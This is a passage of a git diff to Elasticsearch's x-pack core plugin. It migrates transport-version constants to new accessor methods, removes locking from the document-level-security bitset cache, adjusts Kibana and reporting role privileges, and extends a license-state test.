return TransportVersion.zero(); } public Map getExporters() { diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/rollup/RollupFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/rollup/RollupFeatureSetUsage.java index 59d8926a6dcf8..34cdbf4802e95 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/rollup/RollupFeatureSetUsage.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/rollup/RollupFeatureSetUsage.java @@ -50,7 +50,7 @@ protected void innerXContent(XContentBuilder builder, Params params) throws IOEx @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/rollup/job/RollupJob.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/rollup/job/RollupJob.java index 3918f96ae2c56..d36960f948952 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/rollup/job/RollupJob.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/rollup/job/RollupJob.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.core.rollup.job; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.Diff; import org.elasticsearch.cluster.SimpleDiffable; import org.elasticsearch.common.io.stream.StreamInput; @@ -120,6 +119,6 @@ public int hashCode() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } } diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/searchablesnapshots/SearchableSnapshotFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/searchablesnapshots/SearchableSnapshotFeatureSetUsage.java index 70a5e0c7a3ce2..4163d529fac70 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/searchablesnapshots/SearchableSnapshotFeatureSetUsage.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/searchablesnapshots/SearchableSnapshotFeatureSetUsage.java @@ -8,7 +8,6 @@ package org.elasticsearch.xpack.core.searchablesnapshots; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.xcontent.ToXContent; @@ -34,7 +33,7 @@ public SearchableSnapshotFeatureSetUsage(StreamInput input) throws IOException { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/SecurityFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/SecurityFeatureSetUsage.java index 52ccc3c91985c..19f8c6d31f1dd 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/SecurityFeatureSetUsage.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/SecurityFeatureSetUsage.java @@ -112,7 +112,7 @@ public SecurityFeatureSetUsage( @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/authc/TokenMetadata.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/authc/TokenMetadata.java index 54668c9dd2df7..b744d6b64f1b6 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/authc/TokenMetadata.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/authc/TokenMetadata.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.core.security.authc; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.AbstractNamedDiffable; import org.elasticsearch.cluster.ClusterState; import org.elasticsearch.cluster.NamedDiff; @@ -94,7 +93,7 @@ public String toString() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } @Override diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/authz/accesscontrol/DocumentSubsetBitsetCache.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/authz/accesscontrol/DocumentSubsetBitsetCache.java index 1177ff68c34c4..5c969b3545f03 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/authz/accesscontrol/DocumentSubsetBitsetCache.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/authz/accesscontrol/DocumentSubsetBitsetCache.java @@ -31,26 +31,21 @@ import org.elasticsearch.common.settings.Settings; import org.elasticsearch.common.unit.ByteSizeValue; import org.elasticsearch.common.util.concurrent.ConcurrentCollections; -import org.elasticsearch.common.util.concurrent.ReleasableLock; import org.elasticsearch.core.Nullable; import org.elasticsearch.core.TimeValue; import org.elasticsearch.lucene.util.BitSets; import org.elasticsearch.lucene.util.MatchAllBitSet; -import org.elasticsearch.threadpool.ThreadPool; import java.io.Closeable; import java.io.IOException; import java.util.List; import java.util.Map; import java.util.Objects; -import java.util.Optional; import java.util.Set; import java.util.concurrent.ConcurrentHashMap; import java.util.concurrent.ExecutionException; -import java.util.concurrent.ExecutorService; import java.util.concurrent.TimeUnit; import java.util.concurrent.atomic.AtomicLong; -import java.util.concurrent.locks.ReentrantReadWriteLock; /** * This is a cache for {@link BitSet} instances that are used with the {@link DocumentSubsetReader}. @@ -81,6 +76,8 @@ */ public final class DocumentSubsetBitsetCache implements IndexReader.ClosedListener, Closeable, Accountable { + private static final Logger logger = LogManager.getLogger(DocumentSubsetBitsetCache.class); + /** * The TTL defaults to 2 hours. We default to a large cache size ({@link #CACHE_SIZE_SETTING}), and aggressively * expire unused entries so that the cache does not hold on to memory unnecessarily. @@ -102,40 +99,15 @@ public final class DocumentSubsetBitsetCache implements IndexReader.ClosedListen private static final BitSet NULL_MARKER = new FixedBitSet(0); - private static final Logger logger = LogManager.getLogger(DocumentSubsetBitsetCache.class); - - /** - * When a {@link BitSet} is evicted from {@link #bitsetCache}, we need to also remove it from {@link #keysByIndex}. - * We use a {@link ReentrantReadWriteLock} to control atomicity here - the "read" side represents potential insertions to the - * {@link #bitsetCache}, the "write" side represents removals from {@link #keysByIndex}. - * The risk (that {@link Cache} does not provide protection for) is that an entry is removed from the cache, and then immediately - * re-populated, before we process the removal event. To protect against that we need to check the state of the {@link #bitsetCache} - * but we need exclusive ("write") access while performing that check and updating the values in {@link #keysByIndex}. - */ - private final ReleasableLock cacheEvictionLock; - private final ReleasableLock cacheModificationLock; - private final ExecutorService cleanupExecutor; - private final long maxWeightBytes; private final Cache bitsetCache; private final Map> keysByIndex; private final AtomicLong cacheFullWarningTime; - public DocumentSubsetBitsetCache(Settings settings, ThreadPool threadPool) { - this(settings, threadPool.executor(ThreadPool.Names.GENERIC)); - } - /** * @param settings The global settings object for this node - * @param cleanupExecutor An executor on which the cache cleanup tasks can be run. Due to the way the cache is structured internally, - * it is sometimes necessary to run an asynchronous task to synchronize the internal state. */ - protected DocumentSubsetBitsetCache(Settings settings, ExecutorService cleanupExecutor) { - final ReentrantReadWriteLock readWriteLock = new ReentrantReadWriteLock(); - this.cacheEvictionLock = new ReleasableLock(readWriteLock.writeLock()); - this.cacheModificationLock = new ReleasableLock(readWriteLock.readLock()); - this.cleanupExecutor = cleanupExecutor; - + public DocumentSubsetBitsetCache(Settings settings) { final TimeValue ttl = CACHE_TTL_SETTING.get(settings); this.maxWeightBytes = CACHE_SIZE_SETTING.get(settings).getBytes(); this.bitsetCache = CacheBuilder.builder() @@ -150,8 +122,8 @@ protected DocumentSubsetBitsetCache(Settings settings, ExecutorService cleanupEx } @Override - public void onClose(IndexReader.CacheKey ownerCoreCacheKey) { - final Set keys = keysByIndex.remove(ownerCoreCacheKey); + public void onClose(IndexReader.CacheKey indexKey) { + final Set keys = keysByIndex.remove(indexKey); if (keys != null) { // Because this Set has been removed from the map, and the only update to the set is performed in a // Map#compute call, it should not be possible to get a concurrent modification here. @@ -163,24 +135,17 @@ public void onClose(IndexReader.CacheKey ownerCoreCacheKey) { * Cleanup (synchronize) the internal state when an object is removed from the primary cache */ private void onCacheEviction(RemovalNotification notification) { - final BitsetCacheKey bitsetKey = notification.getKey(); - final IndexReader.CacheKey indexKey = bitsetKey.index; - if (keysByIndex.getOrDefault(indexKey, Set.of()).contains(bitsetKey) == false) { - // If the bitsetKey isn't in the lookup map, then there's nothing to synchronize - return; - } - // We push this to a background thread, so that it reduces the risk of blocking searches, but also so that the lock management is - // simpler - this callback is likely to take place on a thread that is actively adding something to the cache, and is therefore - // holding the read ("update") side of the lock. It is not possible to upgrade a read lock to a write ("eviction") lock, but we - // need to acquire that lock here. - cleanupExecutor.submit(() -> { - try (ReleasableLock ignored = cacheEvictionLock.acquire()) { - // it's possible for the key to be back in the cache if it was immediately repopulated after it was evicted, so check - if (bitsetCache.get(bitsetKey) == null) { - // key is no longer in the cache, make sure it is no longer in the lookup map either. - Optional.ofNullable(keysByIndex.get(indexKey)).ifPresent(set -> set.remove(bitsetKey)); - } - } + final BitsetCacheKey cacheKey = notification.getKey(); + final IndexReader.CacheKey indexKey = cacheKey.indexKey; + // the key is *probably* no longer in the cache, so make sure it is no longer in the lookup map. + // note: rather than locking (which destroys our throughput), we're erring on the side of tidying the keysByIndex + // structure even if some other racing thread has already added a new bitset into the cache for this same key. + // the keysByIndex structure is used in onClose (our notification from lucene that a segment has become inaccessible), + // so we might end up failing to *eagerly* invalidate a bitset -- the consequence of that would be temporarily higher + // memory use (the bitset will not be accessed, and it will still be invalidated eventually for size or ttl reasons). + keysByIndex.computeIfPresent(indexKey, (ignored, keys) -> { + keys.remove(cacheKey); + return keys.isEmpty() ? null : keys; }); } @@ -231,41 +196,39 @@ public BitSet getBitSet(final Query query, final LeafReaderContext context) thro final IndexReader.CacheKey indexKey = coreCacheHelper.getKey(); final BitsetCacheKey cacheKey = new BitsetCacheKey(indexKey, query); - try (ReleasableLock ignored = cacheModificationLock.acquire()) { - final BitSet bitSet = bitsetCache.computeIfAbsent(cacheKey, ignore1 -> { - // This ensures all insertions into the set are guarded by ConcurrentHashMap's atomicity guarantees. - keysByIndex.compute(indexKey, (ignore2, set) -> { - if (set == null) { - set = ConcurrentCollections.newConcurrentSet(); - } - set.add(cacheKey); - return set; - }); - final BitSet result = computeBitSet(query, context); - if (result == null) { - // A cache loader is not allowed to return null, return a marker object instead. - return NULL_MARKER; - } - final long bitSetBytes = result.ramBytesUsed(); - if (bitSetBytes > this.maxWeightBytes) { - logger.warn( - "built a DLS BitSet that uses [{}] bytes; the DLS BitSet cache has a maximum size of [{}] bytes;" - + " this object cannot be cached and will need to be rebuilt for each use;" - + " consider increasing the value of [{}]", - bitSetBytes, - maxWeightBytes, - CACHE_SIZE_SETTING.getKey() - ); - } else if (bitSetBytes + bitsetCache.weight() > maxWeightBytes) { - maybeLogCacheFullWarning(); + final BitSet bitSet = bitsetCache.computeIfAbsent(cacheKey, ignore1 -> { + // This ensures all insertions into the set are guarded by ConcurrentHashMap's atomicity guarantees. + keysByIndex.compute(indexKey, (ignore2, keys) -> { + if (keys == null) { + keys = ConcurrentCollections.newConcurrentSet(); } - return result; + keys.add(cacheKey); + return keys; }); - if (bitSet == NULL_MARKER) { - return null; - } else { - return bitSet; + final BitSet result = computeBitSet(query, context); + if (result == null) { + // A cache loader is not allowed to return null, return a marker object instead. + return NULL_MARKER; } + final long bitSetBytes = result.ramBytesUsed(); + if (bitSetBytes > this.maxWeightBytes) { + logger.warn( + "built a DLS BitSet that uses [{}] bytes; the DLS BitSet cache has a maximum size of [{}] bytes;" + + " this object cannot be cached and will need to be rebuilt for each use;" + + " consider increasing the value of [{}]", + bitSetBytes, + maxWeightBytes, + CACHE_SIZE_SETTING.getKey() + ); + } else if (bitSetBytes + bitsetCache.weight() > maxWeightBytes) { + maybeLogCacheFullWarning(); + } + return result; + }); + if (bitSet == NULL_MARKER) { + return null; + } else { + return bitSet; } } @@ -323,11 +286,11 @@ public Map usageStats() { } private static class BitsetCacheKey { - final IndexReader.CacheKey index; + final IndexReader.CacheKey indexKey; final Query query; - private BitsetCacheKey(IndexReader.CacheKey index, Query query) { - this.index = index; + private BitsetCacheKey(IndexReader.CacheKey indexKey, Query query) { + this.indexKey = indexKey; this.query = query; } @@ -340,41 +303,59 @@ public boolean equals(Object other) { return false; } final BitsetCacheKey that = (BitsetCacheKey) other; - return Objects.equals(this.index, that.index) && Objects.equals(this.query, that.query); + return Objects.equals(this.indexKey, that.indexKey) && Objects.equals(this.query, that.query); } @Override public int hashCode() { - return Objects.hash(index, query); + return Objects.hash(indexKey, query); } @Override public String toString() { - return getClass().getSimpleName() + "(" + index + "," + query + ")"; + return getClass().getSimpleName() + "(" + indexKey + "," + query + ")"; } } /** - * This method verifies that the two internal data structures ({@link #bitsetCache} and {@link #keysByIndex}) are consistent with one - * another. This method is only called by tests. + * This test-only method verifies that the two internal data structures ({@link #bitsetCache} and {@link #keysByIndex}) are consistent + * with one another. */ + // visible for testing void verifyInternalConsistency() { - this.bitsetCache.keys().forEach(bck -> { - final Set set = this.keysByIndex.get(bck.index); - if (set == null) { - throw new IllegalStateException( - "Key [" + bck + "] is in the cache, but there is no entry for [" + bck.index + "] in the lookup map" - ); - } - if (set.contains(bck) == false) { + verifyInternalConsistencyCacheToKeys(); + verifyInternalConsistencyKeysToCache(); + } + + /** + * This test-only method iterates over the {@link #bitsetCache} and checks that {@link #keysByIndex} is consistent with it. + */ + // visible for testing + void verifyInternalConsistencyCacheToKeys() { + bitsetCache.keys().forEach(cacheKey -> { + final Set keys = keysByIndex.get(cacheKey.indexKey); + if (keys == null || keys.contains(cacheKey) == false) { throw new IllegalStateException( - "Key [" + bck + "] is in the cache, but the lookup entry for [" + bck.index + "] does not contain that key" + "Key [" + cacheKey + "] is in the cache, but the lookup entry for [" + cacheKey.indexKey + "] does not contain that key" ); } }); - this.keysByIndex.values().stream().flatMap(Set::stream).forEach(bck -> { - if (this.bitsetCache.get(bck) == null) { - throw new IllegalStateException("Key [" + bck + "] is in the lookup map, but is not in the cache"); + } + + /** + * This test-only method iterates over the {@link #keysByIndex} and checks that {@link #bitsetCache} is consistent with it. + */ + // visible for testing + void verifyInternalConsistencyKeysToCache() { + keysByIndex.forEach((indexKey, keys) -> { + if (keys == null || keys.isEmpty()) { + throw new IllegalStateException("The lookup entry for [" + indexKey + "] is null or empty"); + } else { + keys.forEach(cacheKey -> { + if (bitsetCache.get(cacheKey) == null) { + throw new IllegalStateException("Key [" + cacheKey + "] is in the lookup map, but is not in the cache"); + } + }); } }); } diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/authz/store/KibanaOwnedReservedRoleDescriptors.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/authz/store/KibanaOwnedReservedRoleDescriptors.java index 38b78ad357bf5..2f3469b64b9c2 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/authz/store/KibanaOwnedReservedRoleDescriptors.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/authz/store/KibanaOwnedReservedRoleDescriptors.java @@ -519,6 +519,40 @@ static RoleDescriptor kibanaSystem(String name) { ) .privileges("read", "view_index_metadata") .build(), + // For source indices of the Cloud Detection & Response (CDR) packages + // that ships a transform and has ILM policy + RoleDescriptor.IndicesPrivileges.builder() + .indices( + "logs-m365_defender.vulnerability-*", + "logs-microsoft_defender_endpoint.vulnerability-*", + "logs-microsoft_defender_cloud.assessment-*", + "logs-sentinel_one.application_risk-*" + ) + .privileges( + "read", + "view_index_metadata", + // Require "delete_index" to perform ILM policy actions + TransportDeleteIndexAction.TYPE.name() + ) + .build(), + // For ExtraHop, QualysGAV, and SentinelOne Application Dataset specific actions. Kibana reads, writes and manages this + // index + // for configured ILM policies. + RoleDescriptor.IndicesPrivileges.builder() + .indices("logs-extrahop.investigation-*", "logs-qualys_gav.asset-*", "logs-sentinel_one.application-*") + .privileges( + "manage", + "create_index", + "read", + "index", + "write", + "delete", + // Require "delete_index" to perform ILM policy actions + TransportDeleteIndexAction.TYPE.name(), + TransportIndicesAliasesAction.NAME, + TransportAutoPutMappingAction.TYPE.name() + ) + .build(), // For alias indices of the Cloud Detection & Response (CDR) packages that ships a // transform RoleDescriptor.IndicesPrivileges.builder() diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/authz/store/ReservedRolesStore.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/authz/store/ReservedRolesStore.java index 83d9ecacb1f38..b6eaac655da23 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/authz/store/ReservedRolesStore.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/authz/store/ReservedRolesStore.java @@ -324,23 +324,13 @@ private static Map initializeReservedRoles() { null, new RoleDescriptor.ApplicationResourcePrivileges[] { RoleDescriptor.ApplicationResourcePrivileges.builder() - .application("kibana-.kibana") + .application("kibana-*") .resources("*") - .privileges( - "feature_discover.minimal_read", - "feature_discover.generate_report", - "feature_dashboard.minimal_read", - "feature_dashboard.generate_report", - "feature_dashboard.download_csv_report", - "feature_canvas.minimal_read", - "feature_canvas.generate_report", - "feature_visualize.minimal_read", - "feature_visualize.generate_report" - ) + .privileges("reserved_reporting_user") .build() }, null, null, - MetadataUtils.DEFAULT_RESERVED_METADATA, + MetadataUtils.getDeprecatedReservedMetadata("Please grant access via Kibana privileges instead."), null, null, null, @@ -349,7 +339,7 @@ private static Map initializeReservedRoles() { + "including generating and downloading reports. " + "This role implicitly grants access to all Kibana reporting features, " + "with each user having access only to their own reports. Note that reporting users should also be assigned " - + "additional roles that grant read access to the indices that will be used to generate reports." + + "additional roles that grant read access to Kibana, and the indices that will be used to generate reports." ) ), entry(KibanaSystemUser.ROLE_NAME, kibanaSystemRoleDescriptor(KibanaSystemUser.ROLE_NAME)), diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/slm/SLMFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/slm/SLMFeatureSetUsage.java index 53b45827c4a9f..00f7d484be988 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/slm/SLMFeatureSetUsage.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/slm/SLMFeatureSetUsage.java @@ -8,7 +8,6 @@ package org.elasticsearch.xpack.core.slm; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.core.Nullable; @@ -41,7 +40,7 @@ public SLMFeatureSetUsage(@Nullable SnapshotLifecycleStats slmStats) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } public SnapshotLifecycleStats getStats() { diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/slm/SnapshotLifecycleMetadata.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/slm/SnapshotLifecycleMetadata.java index e1478c309cd53..032dc6944726a 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/slm/SnapshotLifecycleMetadata.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/slm/SnapshotLifecycleMetadata.java @@ -8,7 +8,6 @@ package org.elasticsearch.xpack.core.slm; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.Diff; import org.elasticsearch.cluster.DiffableUtils; import org.elasticsearch.cluster.NamedDiff; @@ -132,7 +131,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override @@ -230,7 +229,7 @@ static Diff readLifecyclePolicyDiffFrom(StreamI @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/spatial/SpatialFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/spatial/SpatialFeatureSetUsage.java index 215043a7b4b8e..6f719ac130eda 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/spatial/SpatialFeatureSetUsage.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/spatial/SpatialFeatureSetUsage.java @@ -8,7 +8,6 @@ package org.elasticsearch.xpack.core.spatial; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.xpack.core.XPackFeatureUsage; @@ -34,7 +33,7 @@ public SpatialFeatureSetUsage(StreamInput input) throws IOException { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } SpatialStatsAction.Response statsResponse() { diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/sql/SqlFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/sql/SqlFeatureSetUsage.java index 0b86e27a62f17..1ac236ca5cc1c 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/sql/SqlFeatureSetUsage.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/sql/SqlFeatureSetUsage.java @@ -8,7 +8,6 @@ package org.elasticsearch.xpack.core.sql; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.xcontent.XContentBuilder; @@ -34,7 +33,7 @@ public SqlFeatureSetUsage(Map stats) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } public Map stats() { diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/transform/TransformFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/transform/TransformFeatureSetUsage.java index 909bf6858eab0..3a09ee833d295 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/transform/TransformFeatureSetUsage.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/transform/TransformFeatureSetUsage.java @@ -8,7 +8,6 @@ package org.elasticsearch.xpack.core.transform; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.metadata.Metadata; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -50,7 +49,7 @@ public TransformFeatureSetUsage( @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/transform/TransformMetadata.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/transform/TransformMetadata.java index 86651fe241b3d..b52783dcfa773 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/transform/TransformMetadata.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/transform/TransformMetadata.java @@ -63,7 +63,7 @@ public boolean upgradeMode() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } @Override @@ -150,7 +150,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } } diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/transform/transforms/TransformTaskParams.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/transform/transforms/TransformTaskParams.java index fd48fc9ef4c20..77aa92f830d61 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/transform/transforms/TransformTaskParams.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/transform/transforms/TransformTaskParams.java @@ -93,7 +93,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/votingonly/VotingOnlyNodeFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/votingonly/VotingOnlyNodeFeatureSetUsage.java index 49106c01b96b0..013da1753d523 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/votingonly/VotingOnlyNodeFeatureSetUsage.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/votingonly/VotingOnlyNodeFeatureSetUsage.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.core.votingonly; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.xpack.core.XPackFeatureUsage; import org.elasticsearch.xpack.core.XPackField; @@ -25,7 +24,7 @@ public VotingOnlyNodeFeatureSetUsage() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/watcher/WatcherFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/watcher/WatcherFeatureSetUsage.java index de4dbf601f50b..006effe168254 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/watcher/WatcherFeatureSetUsage.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/watcher/WatcherFeatureSetUsage.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.core.watcher; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.xcontent.XContentBuilder; @@ -33,7 +32,7 @@ public WatcherFeatureSetUsage(boolean available, boolean enabled, Map stats() { diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/watcher/WatcherMetadata.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/watcher/WatcherMetadata.java index c8fc1719ba026..e1a661b57fb0d 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/watcher/WatcherMetadata.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/watcher/WatcherMetadata.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.core.watcher; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.AbstractNamedDiffable; import org.elasticsearch.cluster.NamedDiff; import org.elasticsearch.cluster.metadata.Metadata; @@ -45,7 +44,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } @Override diff --git a/x-pack/plugin/core/src/test/java/org/elasticsearch/license/XPackLicenseStateTests.java b/x-pack/plugin/core/src/test/java/org/elasticsearch/license/XPackLicenseStateTests.java index d788a0b5abd37..710db0287fa2b 100644 --- a/x-pack/plugin/core/src/test/java/org/elasticsearch/license/XPackLicenseStateTests.java +++ b/x-pack/plugin/core/src/test/java/org/elasticsearch/license/XPackLicenseStateTests.java @@ -244,6 +244,13 @@ public void testLastUsedMomentaryFeature() { lastUsed = licenseState.getLastUsed(); assertThat("feature.check updates usage", lastUsed.keySet(), containsInAnyOrder(usage)); assertThat(lastUsed.get(usage), equalTo(200L)); + + // updates to the last used timestamp only happen if the time has increased + currentTime.set(199); + goldFeature.check(licenseState); + lastUsed = licenseState.getLastUsed(); + assertThat("feature.check updates usage", lastUsed.keySet(), containsInAnyOrder(usage)); + assertThat(lastUsed.get(usage), equalTo(200L)); } public void testLastUsedMomentaryFeatureWithSameNameDifferentFamily() { diff --git a/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/ClientHelperTests.java b/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/ClientHelperTests.java index 100f7843713bd..64e37695f060c 100644 --- a/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/ClientHelperTests.java +++ b/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/ClientHelperTests.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.core; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.admin.cluster.health.ClusterHealthRequest; import org.elasticsearch.action.admin.cluster.health.ClusterHealthResponse; @@ -369,7 +368,7 @@ public void testGetPersistableSafeSecurityHeaders() throws IOException { final ClusterState clusterState = mock(ClusterState.class); final DiscoveryNodes discoveryNodes = mock(DiscoveryNodes.class); when(clusterState.nodes()).thenReturn(discoveryNodes); - when(clusterState.getMinTransportVersion()).thenReturn(TransportVersions.MINIMUM_COMPATIBLE); + when(clusterState.getMinTransportVersion()).thenReturn(TransportVersion.minimumCompatible()); // No security header ThreadContext threadContext = new ThreadContext(Settings.EMPTY); final String nonSecurityHeaderKey = "not-a-security-header"; @@ -425,7 +424,7 @@ public void testGetPersistableSafeSecurityHeaders() throws IOException { // Rewritten for older version final TransportVersion previousVersion = 